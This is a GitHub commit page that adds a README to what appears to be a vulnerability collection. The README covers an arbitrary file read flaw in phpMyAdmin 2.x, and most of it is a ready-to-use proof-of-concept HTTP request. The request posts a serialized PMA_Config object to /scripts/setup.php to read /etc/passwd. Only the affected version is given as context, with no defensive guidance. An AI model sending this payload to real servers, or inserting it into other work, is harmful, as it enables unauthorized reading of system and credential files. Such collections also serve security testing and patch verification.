Skip to content

Commit

Permalink
add phpmyadmin 任意文件读取漏洞
Browse files Browse the repository at this point in the history
  • Loading branch information
helloexp committed Mar 1, 2022
1 parent 2324d96 commit b9ae455
Showing 1 changed file with 19 additions and 0 deletions.
19 changes: 19 additions & 0 deletions CMS/phpMyAdmin/PhpMyAdmin 任意文件读取漏洞/README.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,19 @@

## 受影响版本
phpMyAdmin version
2.x版本

## poc
```http request
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate Accept: */*
Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trid ent/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
```

0 comments on commit b9ae455

Please sign in to comment.